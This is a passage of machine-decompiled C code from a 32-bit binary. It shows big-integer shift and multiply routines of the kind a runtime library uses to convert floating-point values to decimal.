									__eflags = _t1151;
									_v464 = _t1151;
									_t1022 = (0 | _t1151 != 0x00000000) + 1;
									_v472 = _t1022;
									__eflags = _t1205;
									if(_t1205 < 0) {
										__eflags = _t1205 - 0xfffffc02;
										if(_t1205 == 0xfffffc02) {
											L101:
											_t766 =  *((intOrPtr*)(_t1235 + _t1022 * 4 - 0x1d4));
											_t195 =  &_v1896;
											 *_t195 = _v1896 & 0x00000000;
											__eflags =  *_t195;
											asm("bsr eax, eax");
											if( *_t195 == 0) {
												_t1040 = 0;
												__eflags = 0;
											} else {
												_t1040 = _t766 + 1;
											}
											_t767 = 0x20;
											_t768 = _t767 - _t1040;
											__eflags = _t768 - 1;
											_t769 = _t768 & 0xffffff00 | _t768 - 0x00000001 > 0x00000000;
											__eflags = _t1022 - 0x73;
											_v1865 = _t769;
											_t1041 = _t1040 & 0xffffff00 | _t1022 - 0x00000073 > 0x00000000;
											__eflags = _t1022 - 0x73;
											if(_t1022 != 0x73) {
												L107:
												_t770 = 0;
												__eflags = 0;
											} else {
												__eflags = _t769;
												if(_t769 == 0) {
													goto L107;
												} else {
													_t770 = 1;
												}
											}
											__eflags = _t1041;
											if(_t1041 != 0) {
												L126:
												_v1400 = _v1400 & 0x00000000;
												_t224 =  &_v472;
												 *_t224 = _v472 & 0x00000000;
												__eflags =  *_t224;
												_push(0);
												_push( &_v1396);
												_push(0x1cc);
												_push( &_v468);
												L313();
												_t1237 =  &(_t1237[4]);
											} else {
												__eflags = _t770;
												if(_t770 != 0) {
													goto L126;
												} else {
													_t1068 = 0x72;
													__eflags = _t1022 - _t1068;
													if(_t1022 < _t1068) {
														_t1068 = _t1022;
													}
													__eflags = _t1068 - 0xffffffff;
													if(_t1068 != 0xffffffff) {
														_t1223 = _t1068;
														_t1178 =  &_v468 + _t1068 * 4;
														_v1880 = _t1178;
														while(1) {
															__eflags = _t1223 - _t1022;
															if(_t1223 >= _t1022) {
																_t208 =  &_v1876;
																 *_t208 = _v1876 & 0x00000000;
																__eflags =  *_t208;
															} else {
																_v1876 =  *_t1178;
															}
															_t210 = _t1223 - 1; // 0x70
															__eflags = _t210 - _t1022;
															if(_t210 >= _t1022) {
																_t1128 = 0;
																__eflags = 0;
															} else {
																_t1128 =  *(_t1178 - 4);
															}
															_t1178 = _t1178 - 4;
															_t936 = _v1880;
															_t1223 = _t1223 - 1;
															 *_t936 = _t1128 >> 0x0000001f ^ _v1876 + _v1876;
															_v1880 = _t936 - 4;
															__eflags = _t1223 - 0xffffffff;
															if(_t1223 == 0xffffffff) {
																break;
															}
															_t1022 = _v472;
														}
														_t1205 = _v1872;
													}
													__eflags = _v1865;
													if(_v1865 == 0) {
														_v472 = _t1068;
													} else {
														_t218 = _t1068 + 1; // 0x73
														_v472 = _t218;
													}
												}
											}
											_t1154 = 1 - _t1205;
											E10001E90(_t1154,  &_v1396, 0, 1);
											__eflags = 1;
											 *(_t1235 + 0xbad63d) = 1 << (_t1154 & 0x0000001f);
											_t778 = 0xbadbae;
										} else {
											_v1396 = _v1396 & 0x00000000;
											_t1069 = 2;
											_v1392 = 0x100000;
											_v1400 = _t1069;
											__eflags = _t1022 - _t1069;
											if(_t1022 == _t1069) {
												_t1132 = 0;
												__eflags = 0;
												while(1) {
													_t938 =  *((intOrPtr*)(_t1235 + _t1132 - 0x570));
													__eflags = _t938 -  *((intOrPtr*)(_t1235 + _t1132 - 0x1d0));
													if(_t938 !=  *((intOrPtr*)(_t1235 + _t1132 - 0x1d0))) {
														goto L101;
													}
													_t1132 = _t1132 + 4;
													__eflags = _t1132 - 8;
													if(_t1132 != 8) {
														continue;
													} else {
														_t166 =  &_v1896;
														 *_t166 = _v1896 & 0x00000000;
														__eflags =  *_t166;
														asm("bsr eax, edi");
														if( *_t166 == 0) {
															_t1133 = 0;
															__eflags = 0;
														} else {
															_t1133 = _t938 + 1;
														}
														_t939 = 0x20;
														_t1224 = _t1069;
														__eflags = _t939 - _t1133 - _t1069;
														_t941 =  &_v460;
														_v1880 = _t941;
														_t1179 = _t941;
														_t171 =  &_v1865;
														 *_t171 = _t939 - _t1133 - _t1069 > 0;
														__eflags =  *_t171;
														while(1) {
															__eflags = _t1224 - _t1022;
															if(_t1224 >= _t1022) {
																_t173 =  &_v1876;
																 *_t173 = _v1876 & 0x00000000;
																__eflags =  *_t173;
															} else {
																_v1876 =  *_t1179;
															}
															_t175 = _t1224 - 1; // 0x0
															__eflags = _t175 - _t1022;
															if(_t175 >= _t1022) {
																_t1134 = 0;
																__eflags = 0;
															} else {
																_t1134 =  *(_t1179 - 4);
															}
															_t1179 = _t1179 - 4;
															_t945 = _v1880;
															_t1224 = _t1224 - 1;
															 *_t945 = _t1134 >> 0x0000001e ^ _v1876 << 0x00000002;
															_v1880 = _t945 - 4;
															__eflags = _t1224 - 0xffffffff;
															if(_t1224 == 0xffffffff) {
																break;
															}
															_t1022 = _v472;
														}
														__eflags = _v1865;
														_t1070 = _t1069 - _v1872;
														_v472 = (0 | _v1865 != 0x00000000) + _t1069;
														_t1181 = _t1070 >> 5;
														_v1884 = _t1070;
														_t1226 = _t1181 << 2;
														E10001E90(_t1181,  &_v1396, 0, _t1226);
														 *(_t1235 + _t1226 - 0x570) = 1 << (_v1884 & 0x0000001f);
														_t778 = _t1181 + 1;
													}
													goto L128;
												}
											}
											goto L101;
										}
										L128:
										_v1400 = _t778;
										_t1025 = 0x1cc;
										_v936 = _t778;
										_t779 = _t778 << 2;
										__eflags = _t779;
										_push(_t779);
										_push( &_v1396);
										_push(0x1cc);
										_push( &_v932);
										L313();
										_t1241 =  &(_t1237[7]);
									} else {
										_v1396 = _v1396 & 0x00000000;
										_t1227 = 2;
										_v1392 = 0x100000;
										_v1400 = _t1227;
										__eflags = _t1022 - _t1227;
										if(_t1022 != _t1227) {
											L53:
											_t956 = _v1872 + 1;
											_t957 = _t956 & 0x0000001f;
											_t1073 = 0x20;
											_v1876 = _t957;
											_t1183 = _t956 >> 5;
											_v1872 = _t1183;
											_v1908 = _t1073 - _t957;
											_t960 = E100100A0(1, _t1073 - _t957, 0);
											_t1075 =  *((intOrPtr*)(_t1235 + _t1022 * 4 - 0x1d4));
											_t961 = _t960 - 1;
											_t108 =  &_v1896;
											 *_t108 = _v1896 & 0x00000000;
											__eflags =  *_t108;
											asm("bsr ecx, ecx");
											_v1884 = _t961;
											_v1912 =  !_t961;
											if( *_t108 == 0) {
												_t1076 = 0;
												__eflags = 0;
											} else {
												_t1076 = _t1075 + 1;
											}
											_t963 = 0x20;
											_t964 = _t963 - _t1076;
											_t1139 = _t1022 + _t1183;
											__eflags = _v1876 - _t964;
											_v1892 = _t1139;
											_t965 = _t964 & 0xffffff00 | _v1876 - _t964 > 0x00000000;
											__eflags = _t1139 - 0x73;
											_v1865 = _t965;
											_t1077 = _t1076 & 0xffffff00 | _t1139 - 0x00000073 > 0x00000000;
											__eflags = _t1139 - 0x73;
											if(_t1139 != 0x73) {
												L59:
												_t966 = 0;
												__eflags = 0;
											} else {
												__eflags = _t965;
												if(_t965 == 0) {
													goto L59;
												} else {
													_t966 = 1;
												}
											}
											__eflags = _t1077;
											if(_t1077 != 0) {
												L81:
												__eflags = 0;
												_t1025 = 0x1cc;
												_push(0);
												_v1400 = 0;
												_v472 = 0;
												_push( &_v1396);
												_push(0x1cc);
												_push( &_v468);
												L313();
												_t1237 =  &(_t1237[4]);
											} else {
												__eflags = _t966;
												if(_t966 != 0) {
													goto L81;
												} else {
													_t1078 = 0x72;
													__eflags = _t1139 - _t1078;
													if(_t1139 >= _t1078) {
														_t1139 = _t1078;
														_v1892 = _t1078;
													}
													_t974 = _t1139;
													_v1880 = _t974;
													__eflags = _t1139 - 0xffffffff;
													if(_t1139 != 0xffffffff) {
														_t1140 = _v1872;
														_t1229 = _t1139 - _t1140;
														__eflags = _t1229;
														_t1082 =  &_v468 + _t1229 * 4;
														_v1888 = _t1082;
														while(1) {
															__eflags = _t974 - _t1140;
															if(_t974 < _t1140) {
																break;
															}
															__eflags = _t1229 - _t1022;
															if(_t1229 >= _t1022) {
																_t1186 = 0;
																__eflags = 0;
															} else {
																_t1186 =  *_t1082;
															}
															__eflags = _t1229 - 1 - _t1022;
															if(_t1229 - 1 >= _t1022) {
																_t979 = 0;
																__eflags = 0;
															} else {
																_t979 =  *(_t1082 - 4);
															}
															_t982 = _v1880;
															_t1082 = _v1888 - 4;
															_v1888 = _t1082;
															 *(_t1235 + _t982 * 4 - 0x1d0) = (_t1186 & _v1884) << _v1876 | (_t979 & _v1912) >> _v1908;
															_t974 = _t982 - 1;
															_t1229 = _t1229 - 1;
															_v1880 = _t974;
															__eflags = _t974 - 0xffffffff;
															if(_t974 != 0xffffffff) {
																_t1022 = _v472;
																continue;
															}
															break;
														}
														_t1139 = _v1892;
														_t1183 = _v1872;
														_t1227 = 2;
													}
													__eflags = _t1183;
													if(_t1183 != 0) {
														__eflags = 0;
														memset( &_v468, 0, _t1183 << 2);
														_t1237 =  &(_t1237[3]);
													}
													__eflags = _v1865;
													_t1025 = 0x1cc;
													if(_v1865 == 0) {
														_v472 = _t1139;
													} else {
														_v472 = _t1139 + 1;
													}
												}
											}
											_v1392 = _v1392 & 0x00000000;
											_v1396 = _t1227;
											_v1400 = 1;
											_v936 = 1;
											_push(4);
										} else {
											_t1086 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *((intOrPtr*)(_t1235 + _t1086 - 0x570)) -  *((intOrPtr*)(_t1235 + _t1086 - 0x1d0));
												if( *((intOrPtr*)(_t1235 + _t1086 - 0x570)) !=  *((intOrPtr*)(_t1235 + _t1086 - 0x1d0))) {
													goto L53;
												}
												_t1086 = _t1086 + 4;
												__eflags = _t1086 - 8;
												if(_t1086 != 8) {
													continue;
												} else {
													_t985 = _v1872 + 2;
													_t986 = _t985 & 0x0000001f;
													_t1087 = 0x20;
													_t1088 = _t1087 - _t986;
													_v1888 = _t986;
													_t1231 = _t985 >> 5;
													_v1876 = _t1231;
													_v1908 = _t1088;
													_t989 = E100100A0(1, _t1088, 0);
													_v1896 = _v1896 & 0x00000000;
													_t990 = _t989 - 1;
													__eflags = _t990;
													asm("bsr ecx, edi");
													_v1884 = _t990;
													_v1912 =  !_t990;
													if(_t990 == 0) {
														_t1089 = 0;
														__eflags = 0;
													} else {
														_t1089 = _t1088 + 1;
													}
													_t992 = 0x20;
													_t993 = _t992 - _t1089;
													_t1142 = _t1231 + 2;
													__eflags = _v1888 - _t993;
													_v1880 = _t1142;
													_t994 = _t993 & 0xffffff00 | _v1888 - _t993 > 0x00000000;
													__eflags = _t1142 - 0x73;
													_v1865 = _t994;
													_t1090 = _t1089 & 0xffffff00 | _t1142 - 0x00000073 > 0x00000000;
													__eflags = _t1142 - 0x73;
													if(_t1142 != 0x73) {
														L28:
														_t995 = 0;
														__eflags = 0;
													} else {
														__eflags = _t994;
														if(_t994 == 0) {
															goto L28;
														} else {
															_t995 = 1;
														}
													}
													__eflags = _t1090;
													if(_t1090 != 0) {
														L50:
														__eflags = 0;
														_t1025 = 0x1cc;
														_push(0);
														_v1400 = 0;
														_v472 = 0;
														_push( &_v1396);
														_push(0x1cc);
														_push( &_v468);
														L313();
														_t1237 =  &(_t1237[4]);
													} else {
														__eflags = _t995;
														if(_t995 != 0) {
															goto L50;
														} else {
															_t1093 = 0x72;
															__eflags = _t1142 - _t1093;
															if(_t1142 >= _t1093) {
																_t1142 = _t1093;
																_v1880 = _t1093;
															}
															_t1094 = _t1142;
															_v1892 = _t1094;
															__eflags = _t1142 - 0xffffffff;
															if(_t1142 != 0xffffffff) {
																_t1143 = _v1876;
																_t1233 = _t1142 - _t1143;
																__eflags = _t1233;
																_t1004 =  &_v468 + _t1233 * 4;
																_v1872 = _t1004;
																while(1) {
																	__eflags = _t1094 - _t1143;
																	if(_t1094 < _t1143) {
																		break;
																	}
																	__eflags = _t1233 - _t1022;
																	if(_t1233 >= _t1022) {
																		_t1192 = 0;
																		__eflags = 0;
																	} else {
																		_t1192 =  *_t1004;
																	}
																	__eflags = _t1233 - 1 - _t1022;
																	if(_t1233 - 1 >= _t1022) {
																		_t1006 = 0;
																		__eflags = 0;
																	} else {
																		_t1006 =  *(_v1872 - 4);
																	}
																	_t1099 = _v1892;
																	 *(_t1235 + _t1099 * 4 - 0x1d0) = (_t1006 & _v1912) >> _v1908 | (_t1192 & _v1884) << _v1888;
																	_t1094 = _t1099 - 1;
																	_t1233 = _t1233 - 1;
																	_t1004 = _v1872 - 4;
																	_v1892 = _t1094;
																	_v1872 = _t1004;
																	__eflags = _t1094 - 0xffffffff;
																	if(_t1094 != 0xffffffff) {
																		_t1022 = _v472;
																		continue;
																	}
																	break;
																}
																_t1142 = _v1880;
																_t1231 = _v1876;
															}
															__eflags = _t1231;
															if(_t1231 != 0) {
																__eflags = 0;
																memset( &_v468, 0, _t1231 << 2);
																_t1237 =  &(_t1237[3]);
															}
															__eflags = _v1865;
															_t1025 = 0x1cc;
															if(_v1865 == 0) {
																_v472 = _t1142;
															} else {
																_v472 = _t1142 + 1;
															}
														}
													}
													_v1392 = _v1392 & 0x00000000;
													_t999 = 4;
													__eflags = 1;
													_v1396 = _t999;
													_v1400 = 1;
													_v936 = 1;
													_push(_t999);
												}
												goto L52;
											}
											goto L53;
										}
										L52:
										_push( &_v1396);
										_push(_t1025);
										_push( &_v932);
										L313();
										_t1241 =  &(_t1237[4]);
									}
									_t782 = _v1904;
									_t1043 = 0xa;
									_v1912 = _t1043;
									__eflags = _t782;
									if(_t782 < 0) {
										_t783 =  ~_t782;
										_t784 = _t783 / _t1043;
										_v1880 = _t784;
										_t1044 = _t783 % _t1043;
										_v1884 = _t1044;
										__eflags = _t784;
										if(_t784 == 0) {
											L249:
											__eflags = _t1044;
											if(_t1044 != 0) {
												_t820 =  *(0x10016484 + _t1044 * 4);
												_v1896 = _t820;
												__eflags = _t820;
												if(_t820 == 0) {
													L260:
													__eflags = 0;
													_push(0);
													_v472 = 0;
													_v2408 = 0;
													goto L261;
												} else {
													__eflags = _t820 - 1;
													if(_t820 != 1) {
														_t1055 = _v472;
														__eflags = _t1055;
														if(_t1055 != 0) {
															_t1161 = 0;
															_t1213 = 0;
															__eflags = 0;
															do {
																_t1113 = _t820 *  *(_t1235 + _t1213 * 4 - 0x1d0) >> 0x20;
																 *(_t1235 + _t1213 * 4 - 0x1d0) = _t820 *  *(_t1235 + _t1213 * 4 - 0x1d0) + _t1161;
																_t820 = _v1896;
																asm("adc edx, 0x0");
																_t1213 = _t1213 + 1;
																_t1161 = _t1113;
																__eflags = _t1213 - _t1055;
															} while (_t1213 != _t1055);
															__eflags = _t1161;
															if(_t1161 != 0) {
																_t826 = _v472;
																__eflags = _t826 - 0x73;
																if(_t826 >= 0x73) {
																	goto L260;
																} else {
																	 *(_t1235 + _t826 * 4 - 0x1d0) = _t1161;
																	_v472 = _v472 + 1;
																}
															}
														}
													}
												}
											}
										} else {
											do {
												__eflags = _t784 - 0x26;
												if(_t784 > 0x26) {
													_t784 = 0x26;
												}
												_t1056 =  *(0x100163ee + _t784 * 4) & 0x000000ff;
												_v1872 = _t784;
												_v1400 = ( *(0x100163ee + _t784 * 4) & 0x000000ff) + ( *(0x100163ef + _t784 * 4) & 0x000000ff);
												E10001E90(_t1056 << 2,  &_v1396, 0, _t1056 << 2);
												_t837 = E10010340( &(( &_v1396)[_t1056]), 0x10015ae8 + ( *(0x100163ec + _v1872 * 4) & 0x0000ffff) * 4, ( *(0x100163ef + _t784 * 4) & 0x000000ff) << 2);
												_t1057 = _v1400;
												_t1241 =  &(_t1241[6]);
												_v1892 = _t1057;
												__eflags = _t1057 - 1;
												if(_t1057 > 1) {
													__eflags = _v472 - 1;
													if(_v472 > 1) {
														__eflags = _t1057 - _v472;
														_t1164 =  &_v1396;
														_t838 = _t837 & 0xffffff00 | _t1057 - _v472 > 0x00000000;
														__eflags = _t838;
														if(_t838 != 0) {
															_t1114 =  &_v468;
														} else {
															_t1164 =  &_v468;
															_t1114 =  &_v1396;
														}
														_v1908 = _t1114;
														__eflags = _t838;
														if(_t838 == 0) {
															_t1057 = _v472;
														}
														_v1876 = _t1057;
														__eflags = _t838;
														if(_t838 != 0) {
															_v1892 = _v472;
														}
														_t1115 = 0;
														_t1215 = 0;
														_v1864 = 0;
														__eflags = _t1057;
														if(_t1057 == 0) {
															L243:
															_v472 = _t1115;
															_t840 = _t1115 << 2;
															__eflags = _t840;
															_push(_t840);
															_t841 =  &_v1860;
															goto L244;
														} else {
															_t1165 = _t1164 -  &_v1860;
															__eflags = _t1165;
															_v1928 = _t1165;
															do {
																_t847 =  *(_t1235 + _t1165 + _t1215 * 4 - 0x740);
																_v1896 = _t847;
																__eflags = _t847;
																if(_t847 != 0) {
																	_t848 = 0;
																	_t1166 = 0;
																	_t1058 = _t1215;
																	_v1888 = 0;
																	__eflags = _v1892;
																	if(_v1892 == 0) {
																		L240:
																		__eflags = _t1058 - 0x73;
																		if(_t1058 == 0x73) {
																			goto L258;
																		} else {
																			_t1165 = _v1928;
																			_t1057 = _v1876;
																			goto L242;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1058 - 0x73;
																			if(_t1058 == 0x73) {
																				goto L235;
																			}
																			__eflags = _t1058 - _t1115;
																			if(_t1058 == _t1115) {
																				 *(_t1235 + _t1058 * 4 - 0x740) =  *(_t1235 + _t1058 * 4 - 0x740) & 0x00000000;
																				_t859 = _t848 + 1 + _t1215;
																				__eflags = _t859;
																				_v1864 = _t859;
																				_t848 = _v1888;
																			}
																			_t854 =  *(_v1908 + _t848 * 4);
																			asm("adc edx, 0x0");
																			 *(_t1235 + _t1058 * 4 - 0x740) =  *(_t1235 + _t1058 * 4 - 0x740) + _t854 * _v1896 + _t1166;
																			asm("adc edx, 0x0");
																			_t848 = _v1888 + 1;
																			_t1058 = _t1058 + 1;
																			_v1888 = _t848;
																			_t1166 = _t854 * _v1896 >> 0x20;
																			_t1115 = _v1864;
																			__eflags = _t848 - _v1892;
																			if(_t848 != _v1892) {
																				continue;
																			} else {
																				goto L235;
																			}
																			while(1) {
																				L235:
																				__eflags = _t1166;
																				if(_t1166 == 0) {
																					goto L240;
																				}
																				__eflags = _t1058 - 0x73;
																				if(_t1058 == 0x73) {
																					goto L258;
																				} else {
																					__eflags = _t1058 - _t1115;
																					if(_t1058 == _t1115) {
																						_t558 = _t1235 + _t1058 * 4 - 0x740;
																						 *_t558 =  *(_t1235 + _t1058 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t558;
																						_t564 = _t1058 + 1; // 0x1
																						_v1864 = _t564;
																					}
																					_t852 = _t1166;
																					_t1166 = 0;
																					 *(_t1235 + _t1058 * 4 - 0x740) =  *(_t1235 + _t1058 * 4 - 0x740) + _t852;
																					_t1115 = _v1864;
																					asm("adc edi, edi");
																					_t1058 = _t1058 + 1;
																					continue;
																				}
																				goto L246;
																			}
																			goto L240;
																		}
																		goto L235;
																	}
																} else {
																	__eflags = _t1215 - _t1115;
																	if(_t1215 == _t1115) {
																		 *(_t1235 + _t1215 * 4 - 0x740) =  *(_t1235 + _t1215 * 4 - 0x740) & _t847;
																		_t526 = _t1215 + 1; // 0x1
																		_t1115 = _t526;
																		_v1864 = _t1115;
																	}
																	goto L242;
																}
																goto L246;
																L242:
																_t1215 = _t1215 + 1;
																__eflags = _t1215 - _t1057;
															} while (_t1215 != _t1057);
															goto L243;
														}
													} else {
														_t1167 = _v468;
														_push(_t1057 << 2);
														_v472 = _t1057;
														_push( &_v1396);
														_push(_t1025);
														_push( &_v468);
														L313();
														_t1241 =  &(_t1241[4]);
														__eflags = _t1167;
														if(_t1167 == 0) {
															goto L203;
														} else {
															__eflags = _t1167 - 1;
															if(_t1167 == 1) {
																goto L245;
															} else {
																__eflags = _v472;
																if(_v472 == 0) {
																	goto L245;
																} else {
																	_t1059 = 0;
																	_v1896 = _v472;
																	_t1216 = 0;
																	__eflags = 0;
																	do {
																		_t867 = _t1167;
																		_t1116 = _t867 *  *(_t1235 + _t1216 * 4 - 0x1d0) >> 0x20;
																		 *(_t1235 + _t1216 * 4 - 0x1d0) = _t867 *  *(_t1235 + _t1216 * 4 - 0x1d0) + _t1059;
																		asm("adc edx, 0x0");
																		_t1216 = _t1216 + 1;
																		_t1059 = _t1116;
																		__eflags = _t1216 - _v1896;
																	} while (_t1216 != _v1896);
																	goto L208;
																}
															}
														}
													}
												} else {
													_t1168 = _v1396;
													__eflags = _t1168;
													if(_t1168 != 0) {
														__eflags = _t1168 - 1;
														if(_t1168 == 1) {
															goto L245;
														} else {
															__eflags = _v472;
															if(_v472 == 0) {
																goto L245;
															} else {
																_t1060 = 0;
																_v1896 = _v472;
																_t1217 = 0;
																__eflags = 0;
																do {
																	_t872 = _t1168;
																	_t1117 = _t872 *  *(_t1235 + _t1217 * 4 - 0x1d0) >> 0x20;
																	 *(_t1235 + _t1217 * 4 - 0x1d0) = _t872 *  *(_t1235 + _t1217 * 4 - 0x1d0) + _t1060;
																	asm("adc edx, 0x0");
																	_t1217 = _t1217 + 1;
																	_t1060 = _t1117;
																	__eflags = _t1217 - _v1896;
																} while (_t1217 != _v1896);
																L208:
																__eflags = _t1059;
																if(_t1059 == 0) {
																	goto L245;
																} else {
																	_t870 = _v472;
																	__eflags = _t870 - 0x73;
																	if(_t870 >= 0x73) {
																		L258:
																		_push(0);
																		_v2408 = 0;
																		_v472 = 0;
																		_push( &_v2404);
																		_push(_t1025);
																		_push( &_v468);
																		L313();
																		_t1241 =  &(_t1241[4]);
																		_t843 = 0;
																	} else {
																		 *(_t1235 + _t870 * 4 - 0x1d0) = _t1059;
																		_v472 = _v472 + 1;
																		goto L245;
																	}
																}
															}
														}
													} else {
														L203:
														_v2408 = 0;
														_v472 = 0;
														_push(0);
														_t841 =  &_v2404;
														L244:
														_push(_t841);
														_push(_t1025);
														_push( &_v468);
														L313();
														_t1241 =  &(_t1241[4]);
														L245:
														_t843 = 1;
													}
												}
												L246:
												__eflags = _t843;
												if(_t843 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_v472 = _v472 & 0x00000000;
													_push(0);
													L261:
													_push( &_v2404);
													_t823 =  &_v468;
													goto L262;
												} else {
													goto L247;
												}
												goto L263;
												L247:
												_t784 = _v1880 - _v1872;
												__eflags = _t784;
												_v1880 = _t784;
											} while (_t784 != 0);
											_t1044 = _v1884;
											goto L249;
										}
									} else {
										_t875 = _t782 / _t1043;
										_v1908 = _t875;
										_t1061 = _t782 % _t1043;
										_v1896 = _t1061;
										__eflags = _t875;
										if(_t875 == 0) {
											L184:
											__eflags = _t1061;
											if(_t1061 != 0) {
												_t1169 =  *(0x10016484 + _t1061 * 4);
												__eflags = _t1169;
												if(_t1169 != 0) {
													__eflags = _t1169 - 1;
													if(_t1169 != 1) {
														_t876 = _v936;
														_v1896 = _t876;
														__eflags = _t876;
														if(_t876 != 0) {
															_t1218 = 0;
															_t1062 = 0;
															__eflags = 0;
															do {
																_t877 = _t1169;
																_t1121 = _t877 *  *(_t1235 + _t1062 * 4 - 0x3a0) >> 0x20;
																 *(_t1235 + _t1062 * 4 - 0x3a0) = _t877 *  *(_t1235 + _t1062 * 4 - 0x3a0) + _t1218;
																asm("adc edx, 0x0");
																_t1062 = _t1062 + 1;
																_t1218 = _t1121;
																__eflags = _t1062 - _v1896;
															} while (_t1062 != _v1896);
															__eflags = _t1218;
															if(_t1218 != 0) {
																_t880 = _v936;
																__eflags = _t880 - 0x73;
																if(_t880 >= 0x73) {
																	goto L186;
																} else {
																	 *(_t1235 + _t880 * 4 - 0x3a0) = _t1218;
																	_v936 = _v936 + 1;
																}
															}
														}
													}
												} else {
													L186:
													_v2408 = 0;
													_v936 = 0;
													_push(0);
													goto L190;
												}
											}
										} else {
											do {
												__eflags = _t875 - 0x26;
												if(_t875 > 0x26) {
													_t875 = 0x26;
												}
												_t1063 =  *(0x100163ee + _t875 * 4) & 0x000000ff;
												_v1888 = _t875;
												_v1400 = ( *(0x100163ee + _t875 * 4) & 0x000000ff) + ( *(0x100163ef + _t875 * 4) & 0x000000ff);
												E10001E90(_t1063 << 2,  &_v1396, 0, _t1063 << 2);
												_t893 = E10010340( &(( &_v1396)[_t1063]), 0x10015ae8 + ( *(0x100163ec + _v1888 * 4) & 0x0000ffff) * 4, ( *(0x100163ef + _t875 * 4) & 0x000000ff) << 2);
												_t1064 = _v1400;
												_t1241 =  &(_t1241[6]);
												_v1892 = _t1064;
												__eflags = _t1064 - 1;
												if(_t1064 > 1) {
													__eflags = _v936 - 1;
													if(_v936 > 1) {
														__eflags = _t1064 - _v936;
														_t1172 =  &_v1396;
														_t894 = _t893 & 0xffffff00 | _t1064 - _v936 > 0x00000000;
														__eflags = _t894;
														if(_t894 != 0) {
															_t1122 =  &_v932;
														} else {
															_t1172 =  &_v932;
															_t1122 =  &_v1396;
														}
														_v1876 = _t1122;
														__eflags = _t894;
														if(_t894 == 0) {
															_t1064 = _v936;
														}
														_v1880 = _t1064;
														__eflags = _t894;
														if(_t894 != 0) {
															_v1892 = _v936;
														}
														_t1123 = 0;
														_t1220 = 0;
														_v1864 = 0;
														__eflags = _t1064;
														if(_t1064 == 0) {
															L177:
															_v936 = _t1123;
															_t896 = _t1123 << 2;
															__eflags = _t896;
															goto L178;
														} else {
															_t1173 = _t1172 -  &_v1860;
															__eflags = _t1173;
															_v1928 = _t1173;
															do {
																_t903 =  *(_t1235 + _t1173 + _t1220 * 4 - 0x740);
																_v1884 = _t903;
																__eflags = _t903;
																if(_t903 != 0) {
																	_t904 = 0;
																	_t1174 = 0;
																	_t1065 = _t1220;
																	_v1872 = 0;
																	__eflags = _v1892;
																	if(_v1892 == 0) {
																		L174:
																		__eflags = _t1065 - 0x73;
																		if(_t1065 == 0x73) {
																			goto L187;
																		} else {
																			_t1173 = _v1928;
																			_t1064 = _v1880;
																			goto L176;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1065 - 0x73;
																			if(_t1065 == 0x73) {
																				goto L169;
																			}
																			__eflags = _t1065 - _t1123;
																			if(_t1065 == _t1123) {
																				 *(_t1235 + _t1065 * 4 - 0x740) =  *(_t1235 + _t1065 * 4 - 0x740) & 0x00000000;
																				_t915 = _t904 + 1 + _t1220;
																				__eflags = _t915;
																				_v1864 = _t915;
																				_t904 = _v1872;
																			}
																			_t910 =  *(_v1876 + _t904 * 4);
																			asm("adc edx, 0x0");
																			 *(_t1235 + _t1065 * 4 - 0x740) =  *(_t1235 + _t1065 * 4 - 0x740) + _t910 * _v1884 + _t1174;
																			asm("adc edx, 0x0");
																			_t904 = _v1872 + 1;
																			_t1065 = _t1065 + 1;
																			_v1872 = _t904;
																			_t1174 = _t910 * _v1884 >> 0x20;
																			_t1123 = _v1864;
																			__eflags = _t904 - _v1892;
																			if(_t904 != _v1892) {
																				continue;
																			} else {
																				goto L169;
																			}
																			while(1) {
																				L169:
																				__eflags = _t1174;
																				if(_t1174 == 0) {
																					goto L174;
																				}
																				__eflags = _t1065 - 0x73;
																				if(_t1065 == 0x73) {
																					L187:
																					__eflags = 0;
																					_v2408 = 0;
																					_v936 = 0;
																					_push(0);
																					_t906 =  &_v2404;
																					goto L188;
																				} else {
																					__eflags = _t1065 - _t1123;
																					if(_t1065 == _t1123) {
																						_t370 = _t1235 + _t1065 * 4 - 0x740;
																						 *_t370 =  *(_t1235 + _t1065 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t370;
																						_t376 = _t1065 + 1; // 0x1
																						_v1864 = _t376;
																					}
																					_t908 = _t1174;
																					_t1174 = 0;
																					 *(_t1235 + _t1065 * 4 - 0x740) =  *(_t1235 + _t1065 * 4 - 0x740) + _t908;
																					_t1123 = _v1864;
																					asm("adc edi, edi");
																					_t1065 = _t1065 + 1;
																					continue;
																				}
																				goto L181;
																			}
																			goto L174;
																		}
																		goto L169;
																	}
																} else {
																	__eflags = _t1220 - _t1123;
																	if(_t1220 == _t1123) {
																		 *(_t1235 + _t1220 * 4 - 0x740) =  *(_t1235 + _t1220 * 4 - 0x740) & _t903;
																		_t338 = _t1220 + 1; // 0x1
																		_t1123 = _t338;
																		_v1864 = _t1123;
																	}
																	goto L176;
																}
																goto L181;
																L176:
																_t1220 = _t1220 + 1;
																__eflags = _t1220 - _t1064;
															} while (_t1220 != _t1064);
															goto L177;
														}
													} else {
														_t1175 = _v932;
														_push(_t1064 << 2);
														_v936 = _t1064;
														_push( &_v1396);
														_push(_t1025);
														_push( &_v932);
														L313();
														_t1241 =  &(_t1241[4]);
														__eflags = _t1175;
														if(_t1175 != 0) {
															__eflags = _t1175 - 1;
															if(_t1175 == 1) {
																goto L180;
															} else {
																__eflags = _v936;
																if(_v936 == 0) {
																	goto L180;
																} else {
																	_t1066 = 0;
																	_v1884 = _v936;
																	_t1221 = 0;
																	__eflags = 0;
																	do {
																		_t922 = _t1175;
																		_t1124 = _t922 *  *(_t1235 + _t1221 * 4 - 0x3a0) >> 0x20;
																		 *(_t1235 + _t1221 * 4 - 0x3a0) = _t922 *  *(_t1235 + _t1221 * 4 - 0x3a0) + _t1066;
																		asm("adc edx, 0x0");
																		_t1221 = _t1221 + 1;
																		_t1066 = _t1124;
																		__eflags = _t1221 - _v1884;
																	} while (_t1221 != _v1884);
																	goto L149;
																}
															}
														} else {
															_v1400 = 0;
															_v936 = 0;
															_push(0);
															_t897 =  &_v1396;
															goto L179;
														}
													}
												} else {
													_t1176 = _v1396;
													__eflags = _t1176;
													if(_t1176 != 0) {
														__eflags = _t1176 - 1;
														if(_t1176 == 1) {
															goto L180;
														} else {
															__eflags = _v936;
															if(_v936 == 0) {
																goto L180;
															} else {
																_t1067 = 0;
																_v1884 = _v936;
																_t1222 = 0;
																__eflags = 0;
																do {
																	_t929 = _t1176;
